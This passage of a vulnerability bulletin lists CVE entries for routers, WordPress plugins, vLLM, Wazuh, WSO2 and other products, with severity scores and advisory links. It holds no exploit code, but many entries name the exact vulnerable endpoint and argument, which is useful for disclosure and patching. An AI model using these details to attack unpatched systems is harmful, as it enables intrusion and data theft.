| Tenda--AC21 | A vulnerability has been found in Tenda AC21 16.03.08.16. This vulnerability affects unknown code of the file /goform/SetSysTimeCfg. The manipulation of the argument timeZone/time leads to stack-based buffer overflow. The attack can be carried out remotely. The exploit has been disclosed to the public and may be used. | 2025-11-20 | 8.8 | CVE-2025-13446 | VDB-333018 \| Tenda AC21 SetSysTimeCfg stack-based overflow VDB-333018 \| CTI Indicators (IOB, IOC, IOA) Submit #694425 \| Tenda AC21 V16.03.08.16 Buffer Overflow Submit #694430 \| Tenda AC21 V16.03.08.16 Buffer Overflow (Duplicate) https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN8.md https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/Tenda/VULN9.md https://www.tenda.com.cn/   |
| Tenda--CH22 | A security vulnerability has been detected in Tenda CH22 1.0.0.1. This impacts the function fromPptpUserSetting of the file /goform/PPTPUserSetting. The manipulation of the argument delno leads to buffer overflow. The attack can be carried out remotely. The exploit has been disclosed publicly and may be used. | 2025-11-17 | 8.8 | CVE-2025-13288 | VDB-332628 \| Tenda CH22 PPTPUserSetting fromPptpUserSetting buffer overflow VDB-332628 \| CTI Indicators (IOB, IOC, IOA) Submit #691594 \| Tenda Technology Co., Ltd. Tenda V1.0.0.1 Buffer Overflow https://github.com/yyyy1g/CVE/issues/1 https://www.tenda.com.cn/   |
| Tenda--CH22 | A vulnerability was detected in Tenda CH22 1.0.0.1. Affected is the function formWrlExtraGet of the file /goform/WrlExtraGet. Performing manipulation of the argument chkHz results in buffer overflow. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-11-19 | 8.8 | CVE-2025-13400 | VDB-332926 \| Tenda CH22 WrlExtraGet formWrlExtraGet buffer overflow VDB-332926 \| CTI Indicators (IOB, IOC, IOA) Submit #692145 \| Tenda CH22 V1.0.0.1 Buffer Overflow https://github.com/f000x0/cve/issues/14 https://www.tenda.com.cn/   |
| The Browser Company of New York--Dia | This vulnerability allowed a site to enter fullscreen, after a user click, without a full-screen notification (toast) appearing. Without this notification, users could potentially be misled about what site they were on if a malicious site renders a fake UI (like a fake address bar). | 2025-11-21 | 7.4 | CVE-2025-13132 | https://www.diabrowser.com/security/bulletins#CVE-2025-13132   |
| ThinPLUS--ThinPLUS | ThinPLUS developed by ThinPLUS has an OS Command Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary OS commands and execute them on the server. | 2025-11-17 | 9.8 | CVE-2025-13284 | https://www.twcert.org.tw/tw/cp-132-10512-e196b-1.html https://www.twcert.org.tw/en/cp-139-10513-0d82b-2.html   |
| thorsten--phpMyFAQ | phpMyFAQ is an open source FAQ web application. Prior to version 4.0.14, an authenticated SQL injection vulnerability in the main configuration update functionality of phpMyFAQ allows a privileged user with 'Configuration Edit' permissions to execute arbitrary SQL commands. Successful exploitation can lead to a full compromise of the database, including reading, modifying, or deleting all data, as well as potential remote code execution depending on the database configuration. This issue has been patched in version 4.0.14. | 2025-11-17 | 7.2 | CVE-2025-62519 | https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-fxm2-cmwj-qvx4 https://github.com/thorsten/phpMyFAQ/compare/4.0.13...4.0.14   |
| UTT-- 750W | A security vulnerability has been detected in UTT 进取 750W up to 3.2.2-191225. Affected by this vulnerability is the function system of the file /goform/formPdbUpConfig. Such manipulation of the argument policyNames leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 7.3 | CVE-2025-13442 | VDB-333015 \| UTT 进取 750W formPdbUpConfig system command injection VDB-333015 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #688782 \| UTT (AiTai) Jinqi 750W <=v5v3.2.2-191225 Buffer Overflow https://github.com/alc9700jmo/CVE/issues/20   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From versions 0.10.2 to before 0.11.1, a memory corruption vulnerability that could lead to a crash (denial-of-service) and potentially remote code execution (RCE) exists in the Completions API endpoint. When processing user-supplied prompt embeddings, the endpoint loads serialized tensors using torch.load() without sufficient validation. Due to a change introduced in PyTorch 2.8.0, sparse tensor integrity checks are disabled by default. As a result, maliciously crafted tensors can bypass internal bounds checks and trigger an out-of-bounds memory write during the call to to_dense(). This memory corruption can crash vLLM and potentially lead to code execution on the server hosting vLLM. This issue has been patched in version 0.11.1. | 2025-11-21 | 8.8 | CVE-2025-62164 | https://github.com/vllm-project/vllm/security/advisories/GHSA-mrw7-hf4f-83pf https://github.com/vllm-project/vllm/pull/27204 https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b   |
| walterpinem--OneClick Chat to Order | The OneClick Chat to Order plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.0.8 via the 'wa_order_thank_you_override' function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to view sensitive customer information including names, email addresses, phone numbers, billing/shipping addresses, order contents, and payment methods by simply changing the order ID in the URL. | 2025-11-22 | 7.5 | CVE-2025-13526 | https://www.wordfence.com/threat-intel/vulnerabilities/id/547a0c73-044e-49ba-9bec-4f80b41b8ea2?source=cve https://plugins.trac.wordpress.org/browser/oneclick-whatsapp-order/trunk/includes/buttons/wa-order-thank-you.php#L126 https://plugins.trac.wordpress.org/changeset/3391625/   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to version 4.13.0, a vulnerability in Wazuh Agent allows authenticated attackers to force NTLM authentication through malicious UNC paths in various agent configuration settings, potentially leading to NTLM relay attacks that would result in privilege escalation and remote code execution. This issue has been patched in version 4.13.0. | 2025-11-21 | 7.7 | CVE-2025-30201 | https://github.com/wazuh/wazuh/security/advisories/GHSA-x697-jf34-gp5x https://github.com/wazuh/wazuh/pull/30060 https://github.com/wazuh/wazuh/commit/688972da589e5d40d2a81bcd738240303a3dc45a   |
| Wireshark Foundation--Wireshark | Kafka dissector crash in Wireshark 4.6.0 and 4.4.0 to 4.4.10 allows denial of service | 2025-11-21 | 7.8 | CVE-2025-13499 | https://www.wireshark.org/security/wnpa-sec-2025-06.html GitLab Issue #20823   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.8, a reflected XSS vulnerability is present when the server islands feature is used in the targeted application, regardless of what was intended by the component template(s). This issue has been patched in version 5.15.8. | 2025-11-19 | 7.1 | CVE-2025-64764 | https://github.com/withastro/astro/security/advisories/GHSA-wrwg-2hg8-v723 https://github.com/withastro/astro/commit/790d9425f39bbbb462f1c27615781cd965009f91   |
| wpwham--Checkout Files Upload for WooCommerce | The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file uploads in all versions up to, and including, 2.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in image files that will execute whenever a user accesses the injected page. | 2025-11-18 | 7.2 | CVE-2025-4212 | https://www.wordfence.com/threat-intel/vulnerabilities/id/09d9785a-db71-4735-b86b-7fa10cf36a0b?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/checkout-files-upload-woocommerce/tags/2.2.1&new_path=/checkout-files-upload-woocommerce/tags/2.2.2   |
| WSO2--WSO2 API Manager | A missing authentication enforcement vulnerability exists in the mutual TLS (mTLS) implementation used by System REST APIs and SOAP services in multiple WSO2 products. Due to improper validation of client certificate-based authentication in certain default configurations, the affected components may permit unauthenticated requests even when mTLS is enabled. This condition occurs when relying on the default mTLS settings for System REST APIs or when the mTLS authenticator is enabled for SOAP services, causing these interfaces to accept requests without enforcing additional authentication. Successful exploitation allows a malicious actor with network access to the affected endpoints to gain administrative privileges and perform unauthorized operations. The vulnerability is exploitable only when the impacted mTLS flows are enabled and accessible in a given deployment. Other certificate-based authentication mechanisms such as Mutual TLS OAuth client authentication and X.509 login flows are not affected, and APIs served through the API Gateway of WSO2 API Manager remain unaffected. | 2025-11-18 | 9.8 | CVE-2025-9312 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4494/   |
| WSO2--WSO2 Open Banking AM | A Cross-Site Request Forgery (CSRF) vulnerability exists in multiple WSO2 products due to the use of the HTTP GET method for state-changing operations within admin services, specifically in the event processor of the Carbon console. Although the SameSite=Lax cookie attribute is used as a mitigation, it is ineffective in this context because it allows cookies to be sent with cross-origin top-level navigations using GET requests. A malicious actor can exploit this vulnerability by tricking an authenticated user into visiting a crafted link, leading the browser to issue unintended state-changing requests. Successful exploitation could result in unauthorized operations such as data modification, account changes, or other administrative actions. According to WSO2 Secure Production Guidelines, exposure of Carbon console services to untrusted networks is discouraged, which may reduce the impact in properly secured deployments. | 2025-11-18 | 8.8 | CVE-2025-6670 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2025/WSO2-2025-4117/   |
| zozothemes--Zegen Core | The Zegen Core plugin for WordPress is vulnerable to Cross-Site Request Forgery to Arbitrary File Upload in versions up to, and including, 2.0.1. This is due to missing nonce validation and missing file type validation in the '/custom-font-code/custom-fonts-uploads.php' file. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 8.8 | CVE-2025-11087 | https://www.wordfence.com/threat-intel/vulnerabilities/id/145deebd-1e15-4f8a-878c-9424c2cd9601?source=cve https://themeforest.net/item/zegen-church-wordpress-theme/25116823   |
| Zyxel--DX3300-T0 firmware | A post-authentication command injection vulnerability in the "priv" parameter of Zyxel DX3300-T0 firmware version 5.50(ABVY.6.3)C0 and earlier could allow an authenticated attacker to execute operating system (OS) commands on an affected device. | 2025-11-18 | 8.8 | CVE-2025-8693 | https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-uncontrolled-resource-consumption-and-command-injection-vulnerabilities-in-certain-4g-lte-5g-nr-cpe-dsl-ethernet-cpe-fiber-onts-security-routers-and-wireless-extenders-11-18-2025   |

| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 1000projects--Design & Development of Student Database Management System | A vulnerability was detected in 1000projects Design & Development of Student Database Management System 1.0. Affected is an unknown function of the file /TeacherLogin/Academics/SubjectDetails.php. The manipulation of the argument SubCode results in sql injection. The attack may be performed remotely. The exploit is now public and may be used. | 2025-11-17 | 6.3 | CVE-2025-13289 | VDB-332629 \| 1000projects Design & Development of Student Database Management System SubjectDetails.php sql injection VDB-332629 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691612 \| 1000projects Design & Development of Student Database Management System V1.0 SQL Injection https://github.com/f14g-orz/CVE/issues/2   |
| _luigi--The Permalinks Cascade | The Permalinks Cascade plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.2. This is due to the plugin not properly verifying that a user is authorized to perform an action in the handleTPCAdminAjaxRequest function. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform unauthorized administrative actions such as enabling or disabling automatic pinging settings and modifying page exclusion settings. | 2025-11-18 | 4.3 | CVE-2025-12372 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c08d420d-d521-4215-9ef7-b5d1c44a19d3?source=cve https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/admin/admin-controller.class.php#L109 https://plugins.trac.wordpress.org/browser/the-permalinks-cascade/tags/2.2/includes/core.class.php#L36   |
| admintwentytwenty--UiPress lite \| Effortless custom dashboards, admin themes and pages | The UiPress lite plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.08. This is due to missing capability checks in the 'uip_process_block_query' AJAX function. This makes it possible for authenticated attackers, with subscriber-level access and above, to extract sensitive user data including password hashes, emails, and other user information that could be used for account takeover attacks. | 2025-11-21 | 6.5 | CVE-2025-10938 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d8aa06eb-774a-4cd9-bd35-2d6409475696?source=cve https://wordpress.org/plugins/uipress-lite/   |
| admintwentytwenty--UiPress lite \| Effortless custom dashboards, admin themes and pages | The UiPress lite \| Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'uip_save_ui_template' function in all versions up to, and including, 3.5.08. This makes it possible for authenticated attackers, with Subscriber-level access and above, to save templates that contain custom JavaScript. | 2025-11-21 | 6.4 | CVE-2025-11003 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b2a01ccc-c98e-4fcc-8eaf-721ec46584fc?source=cve https://plugins.trac.wordpress.org/browser/uipress-lite/tags/3.5.08/admin/core/uiBuilder.php#L613 https://plugins.trac.wordpress.org/browser/uipress-lite/tags/3.5.08/admin/classes/PostTypes/UiTemplates.php#L416   |
| admintwentytwenty--UiPress lite \| Effortless custom dashboards, admin themes and pages | The UiPress lite \| Effortless custom dashboards, admin themes and pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the uip_save_site_option() function in all versions up to, and including, 3.5.08. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary plugin settings. Other AJAX actions are also affected. | 2025-11-21 | 4.3 | CVE-2025-11815 | https://www.wordfence.com/threat-intel/vulnerabilities/id/8f8d7397-0201-4194-8604-057f905ef10b?source=cve https://plugins.trac.wordpress.org/browser/uipress-lite/trunk/admin/core/ajax-functions.php#L396 https://plugins.trac.wordpress.org/changeset/3398753/   |
| aioseo--Broken Link Checker by AIOSEO Easily Fix/Monitor Internal and External links | The Broken Link Checker by AIOSEO - Easily Fix/Monitor Internal and External links plugin for WordPress is vulnerable to unauthorized post modification due to missing authorization in all versions up to, and including, 1.2.5. This is due to the plugin registering a REST API endpoint that only checks for a broad capability (aioseo_blc_broken_links_page) that is granted to contributor level users, without verifying the user's permission to perform actions on the specific post being targeted. This makes it possible for authenticated attackers, with contributor level access and above, to trash arbitrary posts via the DELETE /wp-json/aioseoBrokenLinkChecker/v1/post endpoint. | 2025-11-18 | 5.4 | CVE-2025-11734 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0254cd1b-f8f6-400e-a48e-81bd553fe8d1?source=cve https://plugins.trac.wordpress.org/changeset/3390304/broken-link-checker-seo   |
| alekv--Pixel Manager for WooCommerce Track Conversions and Analytics, Google Ads, TikTok and more | The Pixel Manager for WooCommerce - Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.49.2 via the ajax_pmw_get_product_ids() function due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to. | 2025-11-18 | 5.3 | CVE-2025-12545 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9babb946-4033-4e66-8f59-b73185ffcd49?source=cve https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L343 https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L1235   |
| amans2k--FunnelKit Funnel Builder for WooCommerce Checkout | The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `wfop_phone` shortcode in all versions up to, and including, 3.13.1.2. This is due to insufficient input sanitization and output escaping on the user-supplied `default` attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-19 | 6.4 | CVE-2025-12878 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6f54053e-30ff-449b-b696-92d503011a4d?source=cve https://wordpress.org/plugins/funnel-builder https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L30 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L96 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L101 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.2/modules/optins/merge-tags/class-bwf-optin-tags.php#L116 https://plugins.trac.wordpress.org/changeset/3397106/funnel-builder/tags/3.13.1.3/merge-tags/class-bwf-contact-tags.php   |
| AMD--AMD EPYC 9004 Series Processors | A bug within some AMD CPUs could allow a local admin-privileged attacker to run a SEV-SNP guest using stale TLB entries, potentially resulting in loss of data integrity. | 2025-11-21 | 5.3 | CVE-2025-29934 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3029.html   |
| AMD--AMD Prof | Improper input validation within AMD uprof can allow a local attacker to overwrite MSR registers, potentially resulting in crash or denial of service. | 2025-11-21 | 5.5 | CVE-2025-48502 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9019.html   |
| antiochinteractive--Shortcode for Google Street View | The Shortcode for Google Street View plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'streetview' shortcode in all versions up to, and including, 0.5.7. This is due to insufficient input sanitization and output escaping on the 'id' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11808 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a8a5b5ce-9975-449b-bdd1-d139f1360297?source=cve https://plugins.trac.wordpress.org/browser/wp-google-street-view-shortcode/tags/0.5.7/gsv-shortcode.php#L108   |
| arkadiykilesso--Download Panel (Biggiko Team) | The Download Panel plugin for WordPress is vulnerable to unauthorized settings modification due to a missing capability check on the 'wp_ajax_save_settings' AJAX action in all versions up to, and including, 1.3.3. This is due to the absence of any capability verification in the `dlpn_save_settings()` function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to arbitrarily modify plugin settings including display text, download links, button colors, and other visual customizations. | 2025-11-18 | 4.3 | CVE-2025-12961 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e1a1df7e-1a57-45b3-a4b3-cb3218782ad9?source=cve https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L50 https://plugins.trac.wordpress.org/browser/download-panel/tags/1.3.3/plugin.php#L51   |
| artibot--ArtiBot Free Chat Bot for WebSites | The ArtiBot Free Chat Bot for WebSites plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.1.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12078 | https://www.wordfence.com/threat-intel/vulnerabilities/id/efe48adb-af9f-45dc-b693-ae56dce1bfe2?source=cve https://wordpress.org/plugins/artibot/   |
| ashraf-kabir--travel-agency | A weakness has been identified in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected is an unknown function of the file /customer_register.php. Executing manipulation can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. This product takes the approach of rolling releases to provide continuous delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-23 | 6.3 | CVE-2025-13544 | VDB-333311 \| ashraf-kabir travel-agency customer_register.php unrestricted upload VDB-333311 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690975 \| travel-agency web 1 File Upload Vulnerability https://github.com/www223-ai/CVE/blob/main/travel-File%20Upload.docx   |
| ashraf-kabir--travel-agency | A vulnerability was detected in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected by this issue is some unknown functionality of the file /results.php of the component Search. The manipulation of the argument user_query results in sql injection. The attack can be launched remotely. The exploit is now public and may be used. This product does not use versioning. This is why information about affected and unaffected releases is unavailable. | 2025-11-23 | 6.3 | CVE-2025-13546 | VDB-333313 \| ashraf-kabir travel-agency Search results.php sql injection VDB-333313 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691466 \| travel-agency web 1 SQL Injection vulnerability https://github.com/www223-ai/CVE/blob/main/travel-sql2.docx   |
| ashraf-kabir--travel-agency | A security vulnerability has been detected in ashraf-kabir travel-agency up to 1f25aa03544bc5fb7a9e846f8a7879cecdb0cad3. Affected by this vulnerability is an unknown functionality of the file /admin_area/index.php. The manipulation of the argument edit_pack leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. Continuous delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-23 | 4.7 | CVE-2025-13545 | VDB-333312 \| ashraf-kabir travel-agency index.php sql injection VDB-333312 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690978 \| travel-agency web 1 SQL Injection Vulnerability https://github.com/www223-ai/CVE/blob/main/travel-sql.docx   |
| awensley--Project Honey Pot Spam Trap | The Project Honey Pot Spam Trap plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the printAdminPage() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12406 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e774476d-3696-4489-b028-16c25f8db1ca?source=cve https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L244 https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L248 https://plugins.trac.wordpress.org/browser/project-honey-pot-spam-trap/tags/1.0.1/project_honey_pot.php#L293   |
| AWS--Wickr | Improper resource release in the call termination process in AWS Wickr before version 6.62.13 on Windows, macOS and Linux may allow a call participant to continue receiving audio input from another user after they close their call window. This issue occurs under certain conditions, which require the affected user to take a particular action within the application. To mitigate this issue, users should upgrade AWS Wickr, Wickr Gov and Wickr Enterprise desktop version to version 6.62.13. | 2025-11-21 | 5.7 | CVE-2025-13524 | https://aws.amazon.com/security/security-bulletins/AWS-2025-029/ https://docs.aws.amazon.com/wickr/latest/enterpriseadminguide/clients-release-notes-6.62.html   |
| ays-pro--Quiz Maker | The Quiz Maker plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 6.7.0.80. This is due to the plugin exposing quiz answers through the ays_quiz_check_answer AJAX action without proper authorization checks. The endpoint only validates a nonce, but that same nonce is publicly available to all site visitors via the quiz_maker_ajax_public localized script data. This makes it possible for unauthenticated attackers to extract sensitive data including quiz answers for any quiz question. | 2025-11-19 | 5.3 | CVE-2025-12426 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bc524e3e-9b7c-47ae-ab44-c327b287b81a?source=cve https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L8490 https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/includes/class-quiz-maker.php#L393 https://plugins.trac.wordpress.org/browser/quiz-maker/tags/6.7.0.69/public/class-quiz-maker-public.php#L179   |
| bandido--Checkbox | The Checkbox plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'wp_ajax_nopriv_checkbox_clean_log' AJAX endpoint in all versions up to, and including, 2.8.10. This makes it possible for unauthenticated attackers to clear log files. | 2025-11-21 | 5.3 | CVE-2025-12170 | https://www.wordfence.com/threat-intel/vulnerabilities/id/16735e63-d652-4b0e-b454-2bd13368d8a7?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3392710%40checkbox&new=3392710%40checkbox&sfp_email=&sfph_mail=   |
| bartboy011--Bulma Shortcodes | The Bulma Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' shortcode attribute in the bulma-notification shortcode in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11802 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e119d542-7cac-47e4-ae13-5382911f1f5e?source=cve https://plugins.trac.wordpress.org/browser/bulma-shortcodes/tags/1.0/inc/components.php#L36   |
| bdeleasa--WP Company Info | The WP Company Info plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' attribute of the 'social-networks' shortcode in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11826 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6743a762-6d40-4ed9-95f2-f1b405683f26?source=cve https://plugins.trac.wordpress.org/browser/wp-company-info/tags/1.9.0/classes/class-wp-company-info-social-links.php#L244   |
| bdthemes--Element Pack Addons for Elementor | The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Open Street Map widget's marker content parameter in all versions up to, and including, 8.3.4. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the render function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 5.4 | CVE-2025-13196 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0da6a080-260f-4b19-a32c-453d2781389a?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3396544%40bdthemes-element-pack-lite&old=3395028%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=   |
| beycanpress--Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO | The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthenticated and unauthorized modification of data due to missing authentication and capability checks on the 'createSaleRecord' function in all versions up to, and including, 2.4.6. This makes it possible for unauthenticated attackers to manipulate presales counters. | 2025-11-21 | 5.3 | CVE-2025-11771 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5c5793f-4d98-4ec1-a9b6-6e7c3f8b6099?source=cve https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L275   |
| beycanpress--Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO | The Cryptocurrency (Token), Launchpad (Presale), ICO & IDO, Airdrop by TokenICO plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'saveDeployedContract' function in all versions up to, and including, 2.4.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the WordPress option `tokenico_deployed_contracts`, poisoning the smart contract addresses displayed. | 2025-11-21 | 4.3 | CVE-2025-11773 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e02597b1-eea6-4fdd-baeb-527201d1c61f?source=cve https://plugins.trac.wordpress.org/browser/tokenico-cryptocurrency-token-launchpad-presale-ico-ido-airdrop/tags/2.4.6/app/RestAPI.php#L108   |
| bhargavbhandari90--Meta Display Block | The Meta Display Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Meta Display Block in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-12088 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68251e79-d064-4be4-a218-92a03e27b59d?source=cve https://wordpress.org/plugins/meta-display-block/   |
| billybigpotatoes--BrightTALK WordPress Shortcode | The BrightTALK WordPress Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'format' shortcode attribute in the brighttalk-time shortcode in all versions up to, and including, 2.4.0. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11770 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3e3b5433-e17b-4ece-9e5c-ef4d818068dc?source=cve https://plugins.trac.wordpress.org/browser/brighttalk-wp-shortcode/tags/2.4.0/brighttalk-wp-shortcode.php#L130   |
| Black Duck--Black Duck SCA | Black Duck SCA versions prior to 2025.10.0 had user role permissions configured in an overly broad manner. Users with the scoped Project Manager user role and the Global User Read access permission enabled could access certain Project Administrator functionalities which should have been inaccessible. Exploitation does not grant full system control, but it may enable unauthorized changes to project configurations or access to sensitive system information. | 2025-11-21 | 5.4 | CVE-2025-0504 | https://community.blackduck.com/s/article/Black-Duck-Product-Security-Advisory-CVE-2025-0504 |
| BlackBerry--BlackBerry AtHoc (OnPrem) | An Insecure Direct Object Reference (IDOR) vulnerability in the Management Console of BlackBerry® AtHoc® (OnPrem) version 7.21 could allow an attacker to potentially gain unauthorized knowledge about other organizations hosted on the same Interactive Warning System (IWS). | 2025-11-19 | 5 | CVE-2025-12766 | https://support.blackberry.com/pkb/s/article/140929   |
| bplugins--Icon List Block Add Icon-Based Lists with Custom Styles | The Icon List Block - Add Icon-Based Lists with Custom Styles plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1 via the fs_api_request function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Only valid JSON objects are rendered in the response. | 2025-11-18 | 6.4 | CVE-2025-12376 | https://www.wordfence.com/threat-intel/vulnerabilities/id/438e2911-7663-44fe-883f-19ad29972aac?source=cve https://plugins.trac.wordpress.org/browser/icon-list-block/tags/1.2.0/bplugins_sdk/inc/Base/FSActivate.php#L168   |
